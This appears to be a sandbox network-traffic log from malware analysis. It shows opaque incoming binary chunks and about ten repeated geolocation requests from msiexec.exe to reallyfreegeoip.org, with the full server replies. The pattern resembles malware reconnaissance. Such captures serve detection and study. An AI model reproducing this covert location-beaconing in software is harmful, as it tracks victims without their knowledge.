                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: d6 d1 b5 08 b8 42 7e 97 f8 fa e1 8c 0b 75 57 f0 b8 98 50 05 51 dc be 9a 8e a7 9f f5 32 75 00 7e 3b 32 a5 13 2a e6 e4 52 de f8 d6 e4 21 05 74 23 fc 1d 34 2c 11 10 87 40 3b d0 15 6a 4a 2d c6 39 a0 aa e6 6e 1d 85 c9 c7 8a 95 a1 42 f6 7b 41 17 7c d5 d3 75 59 e4 f7 c9 2e b2 cb 70 d6 60 7b 85 70 61 dc 27 90 68 91 21 41 1d 7a ae b2 10 f7 52 08 87 dd 78 0f 00 68 a5 a1 11 1c 39 38 0f c9 4d 25 ee d3 dd ac 28 96 46 08 85 da a9 46 39 96 ae b6 02 7b a2 3f 7a ce 08 26 3e 76 8f b6 72 07 5d e6 9f 55 f2 26 91 49 b5 2a 6e d7 19 d5 1a 95 e7 8a 70 49 60 5f 67 a6 95 d4 66 33 79 aa bd 7b 23 70 56 b8 5c 73 7a 3a 7e f8 de 9f 29 16 3c 53 3e ca d4 f8 bc d2 44 29 ae 63 d5 a4 64 56 7f 56 68 70 d2 6d 53 95 04 bb 3f 25 41 94 19 c7 9b 2e 05 cc cb aa 94 d9 3a cf 55 02 0b 2a 9f 4c 2d da
                                                                                                                                                                          Data Ascii: B~uWPQ2u~;2*R!t#4,@;jJ-9nB{A|uY.p`{pa'h!AzRxh98M%(FF9{?z&>vr]U&I*npI`_gf3y{#pV\sz:~)<S>D)cdVVhpmS?%A.:U*L-
                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: 4f bd 0f e8 84 3f 85 43 b2 e1 fb 0f 19 4f 56 d7 ae 17 c2 fb c6 79 2b a3 ea b9 19 4d 9b 26 f2 ac d1 f7 99 e8 ec 4b 83 76 e8 dd 4e 8c e2 b5 3e 20 42 59 db 2f 86 05 9c fa 2a e6 9f d6 fc df 58 46 e1 bd 23 a1 46 8c 2e 45 fb 58 89 35 cd 18 ff 56 08 94 c3 2a 4f ba 5d 45 f0 01 c8 3c da e8 e7 79 9e d8 0a 93 ed 48 c6 e2 fd c2 37 44 11 5f c6 4e bc 5a ad 36 69 63 46 63 ad c2 1e d8 39 77 12 9e a2 b2 a1 f5 91 45 e4 14 ba c8 3e d9 40 91 5e 42 db b9 92 3f d3 e9 c9 fa 05 6a 1b be 0d 0c f5 d5 fe 89 a7 10 63 0c 9d 55 bb 92 94 8f 61 52 76 20 57 7d 8f c2 fb 21 b8 29 cb 55 09 c7 b7 3d 36 05 86 05 f7 e6 1a cb 5d 78 fe d7 20 e7 52 de 62 a9 64 1c 74 86 5a 0d 7e 56 37 9b 57 9d fc f2 d3 db 7b cc 58 96 d0 ea 44 2e 34 3b 3b 0a 6b be 10 68 46 81 8b cb d9 87 c7 67 47 35 13 a4 40 18 56
                                                                                                                                                                          Data Ascii: O?COVy+M&KvN> BY/*XF#F.EX5V*O]E<yH7D_NZ6icFc9wE>@^B?jcUaRv W}!)U=6]x RbdtZ~V7W{XD.4;;khFgG5@V
                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: 2a c6 8e e6 9c 06 4a df 06 de ac ad f0 53 fe 91 17 f1 54 0e d7 f3 bd 23 3d 08 f5 3e 26 3f e0 33 45 bf 51 6a 99 1f 46 d3 87 9f 3f 9e 07 3e 3b 4b 67 40 76 c0 a3 26 93 15 89 54 69 b8 f3 d6 2b c8 d9 a5 9b 1e 30 51 82 e8 41 7e 9c 19 30 cd 89 29 be ce 23 17 28 bb 4e 8d 00 4b 91 c8 68 f8 4c e2 29 cb c6 ba fa 15 5f cb f8 d8 33 aa c8 76 4c e4 27 c1 f2 a5 12 42 e6 60 8e 2d a3 9c c7 4b 3c 11 08 51 3e b5 b0 af 22 5a 47 b0 d7 de 59 63 cf 0a 7b 03 ff 01 b7 ef 53 86 2a a5 23 bd 8e 6a d4 b7 a2 e2 11 34 47 f5 d6 c9 bd e2 6f 80 ce 55 ea 68 b7 e9 38 e6 0d 9f 3c 88 d8 e5 34 21 77 af 38 18 f7 ff af a3 04 91 8e 36 cf 04 c0 6a e1 65 ac 2d 2b 4e ab 6a 21 23 95 95 c7 04 8a 72 b2 3c f8 e7 08 c9 1f 27 83 c0 88 49 6b 3b fe d3 1d 9e fd 9a c3 c9 3a 48 11 51 bb 25 7a 93 e4 a5 b8 e2 b1
                                                                                                                                                                          Data Ascii: *JST#=>&?3EQjF?>;Kg@v&Ti+0QA~0)#(NKhL)_3vL'B`-K<Q>"ZGYc{S*#j4GoUh8<4!w86je-+Nj!#r<'Ik;:HQ%z
                                                                                                                                                                          2024-12-16 15:33:24 UTC1390INData Raw: 2e 81 e1 76 89 0b 39 66 12 57 ea 1e a9 02 3b f1 9d b0 a8 f8 dc ee 21 0e 7f 2f ed 0c 0a 34 db 10 8d 4a 27 5d 44 7b 34 12 e3 2f d6 24 26 6e 6d a7 e7 0b 8a 93 09 67 f0 14 7a 2d 7c d1 75 2e 7a 96 1c dc 5d 7e e3 30 dc 0f b0 27 55 72 a2 70 81 79 99 ec aa 07 08 b3 a0 01 8b 9f e2 9c c6 ff 4f de 78 81 ac 33 6e a0 22 1c aa ef 28 9b fb 69 a6 f6 9c e4 2d 9d a8 38 2d 0c e6 0c 97 69 c6 14 3f 0a d2 82 82 24 04 f6 b2 8c 76 ec da fb 41 cb d7 32 61 c0 37 e3 9d 0a cb 69 69 e4 f8 3b 21 7f 2f c5 87 aa b5 d2 33 73 d2 d8 4c 3b 72 19 f5 5c 03 de 0e 79 97 f2 b7 6d 12 9e 70 24 65 64 fa bc a2 c3 24 81 1d f5 ae 77 4d dd 5b 16 02 95 71 8d e5 a6 93 4a 25 3f aa 0a d2 e1 6a 90 ce cf a8 b3 e0 bb bf 43 20 9c d4 9e 55 1b 35 63 eb d4 c3 bd e6 94 0f 97 57 46 19 2d f9 db 1e 9f 4f 5e 88 f1 5b
                                                                                                                                                                          Data Ascii: .v9fW;!/4J']D{4/$&nmgz-|u.z]~0'UrpyOx3n"(i-8-i?$vA2a7ii;!/3sL;r\ymp$ed$wM[qJ%?jC U5cWF-O^[


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49806        104.21.67.152   443               8000  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes transferred  Direction  Data (indented below)
2024-12-16 15:33:29 UTC  85                 OUT
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-16 15:33:29 UTC  880                IN
    HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:29 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 351978
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7njDdXEFmje0rGQaPp0ITXKqqCWteDJC6%2F2JrRucZh%2FykN2jZ7T7BJTcZIoXHSvqC%2Bu1UwKQ4aw3MXdP%2Fhh%2FhL8wBgANwJL9uxhgRyNqgWirl2x7oMHL55xA4ZpM7zAPnTbFxfAI"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f2fbb6b9abd7d13-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1793&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1556503&cwnd=252&unsent_bytes=0&cid=bff1cf01b5e8c277&ts=465&x=0"
2024-12-16 15:33:29 UTC  362                IN
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.4  49812        104.21.67.152   443               8000  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes transferred  Direction  Data (indented below)
2024-12-16 15:33:31 UTC  61                 OUT
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2024-12-16 15:33:31 UTC  880                IN
    HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:31 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 351980
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oMONQ7ooViY0XEe9OZF0ujrbp0bzg%2Fxe7tb7CixovYae%2FkGNImui9Mlp%2BcpqDeIAG92pxjlmdkKqKb04biSeVdZeeG3Jr1j5vFhCNeN0B4Won%2F6Uz0QZfVfN5iLJiG1hC82yC%2Fox"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f2fbb78bdcf421c-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1605&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1740166&cwnd=252&unsent_bytes=0&cid=ff127ae843af9ac6&ts=482&x=0"
2024-12-16 15:33:31 UTC  362                IN
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.4  49824        104.21.67.152   443               8000  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes transferred  Direction  Data (indented below)
2024-12-16 15:33:34 UTC  85                 OUT
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-16 15:33:34 UTC  874                IN
    HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:34 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 351983
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xDKEgMVIZpAzgGZYYhATz9qIxqAmVh3pWIiNCDUwU9PyTJqrYUDdYhdiSOeRzH%2Bh1OwccwQ7D2cuhNNzg%2BfdriR85Ij6VrIDZajwPhpsVT18EpukGqbejwtV8cZaM2cVTFn7RNqa"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f2fbb8c1a2a19cf-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1821&rtt_var=695&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1561497&cwnd=252&unsent_bytes=0&cid=e3ae97fb04f27d30&ts=487&x=0"
2024-12-16 15:33:34 UTC  362                IN
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.4  49831        104.21.67.152   443               8000  C:\Windows\SysWOW64\msiexec.exe

Timestamp                Bytes transferred  Direction  Data (indented below)
2024-12-16 15:33:37 UTC  61                 OUT
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2024-12-16 15:33:38 UTC  870                IN
    HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:37 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 351986
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jyYBcz9u7uvbB64AC5Flkx2LhaME772d9hThXUkZQn05mzZYTgP8hoSritYzNAzecMbnOKvCG2tPn91XYeCT3kvZr3ICwoLJXyRCcCQzm747NZYHWsirC9jezT5tPNQP9ADgoJ2g"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f2fbba02da6c407-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1526&rtt_var=583&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1858688&cwnd=197&unsent_bytes=0&cid=ebf5759f9aa169fb&ts=478&x=0"
                                                                                                                                                                          2024-12-16 15:33:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49840 | 104.21.67.152 | 443 | 8000 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 15:33:40 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-16 15:33:41 UTC | 874 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:41 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 351990
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYfnxbWhsys14J4UhoKnYgE0hnz70zS%2B8NhrXbDbCk4JobZE3WCXxiH5NGK8WzvSgxArLNCG9pDCWrgGCJ93t24erOm5nGWkY1XveOTHzbPeA%2BxqT2kjBNL4g2yThC7JkkfnL7Gx"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f2fbbb4fff88cb3-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1956&min_rtt=1950&rtt_var=744&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1457813&cwnd=226&unsent_bytes=0&cid=d77ce3d7e3286e72&ts=503&x=0"
2024-12-16 15:33:41 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49848 | 104.21.67.152 | 443 | 8000 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 15:33:44 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-16 15:33:44 UTC | 872 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:44 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 351993
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mya9dXZ5HlPnWExaeJhbiqyB6AWQEEyTUOlHp1ukFehYE09DvWbXVxEchmyJWOoyfoZ7JlFZPrb1qGeocKm06OKni8IUJxBOPYC7F5cDSYnTfeHpKihSwsH6eLNA5XRIj5XKk5JU"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f2fbbcadb4617e9-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=46658&min_rtt=34921&rtt_var=21479&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=83617&cwnd=232&unsent_bytes=0&cid=2a89befde1e1e08e&ts=718&x=0"
2024-12-16 15:33:44 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49855 | 104.21.67.152 | 443 | 8000 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 15:33:47 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-16 15:33:48 UTC | 878 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:47 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 351996
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7cz7XeifQ4DgPHlEQnq%2BnxaoUTR7gif9ufgY9j%2FxoIWn5agMZjUzUzcZsGCFEFX62TSV0aXcOBfoCl1K6tbrANktLGEiTGcx9QCDm4CS4N%2F0wj3Jm9SZ%2BY4MlshexcH7v8Oyj9HT"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f2fbbddebef7cfc-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1834&min_rtt=1830&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1567364&cwnd=223&unsent_bytes=0&cid=0e6d353e17cb8ae6&ts=466&x=0"
2024-12-16 15:33:48 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49867 | 104.21.67.152 | 443 | 8000 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 15:33:50 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-16 15:33:51 UTC | 863 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:51 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: MISS
    Last-Modified: Mon, 16 Dec 2024 15:33:51 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GWLaLYnxgriaYeE7dK1Qe6BPTtknU2GMZ5uExLdDJrU%2BiwzwAk7r%2FZ4hP23jf3cLAwlCbDpJFS8B2S4OuoB9mmVOXyLGI5JnlDP9I89lJTatlJHR1eV1U1%2BKptfcKsPBOrucXaqf"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f2fbbf33e869c42-IAD
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=7219&min_rtt=7204&rtt_var=2732&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=398525&cwnd=32&unsent_bytes=0&cid=d5f4fc84af10d6cf&ts=926&x=0"
2024-12-16 15:33:51 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49874 | 104.21.67.152 | 443 | 8000 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 15:33:54 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-16 15:33:54 UTC | 877 | IN | HTTP/1.1 200 OK
    Date: Mon, 16 Dec 2024 15:33:54 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 352003
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c0bCHPxJWzhYQk9cOvGybd5v%2BfUSGqoBKXYu7JLeu5FCxpQCQkiTwUUXuRQFR5KRzebvwFCYfcQ9SiKpOekHe%2B1AhlT0AvqATluI6UNdaBxtNU2V5tvMV%2BwMG%2BiZkdIdUqa2i822"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f2fbc097ca28ca8-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=2000&rtt_var=1000&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=51968&cwnd=162&unsent_bytes=0&cid=6f3d5ada0d0d3b37&ts=516&x=0"
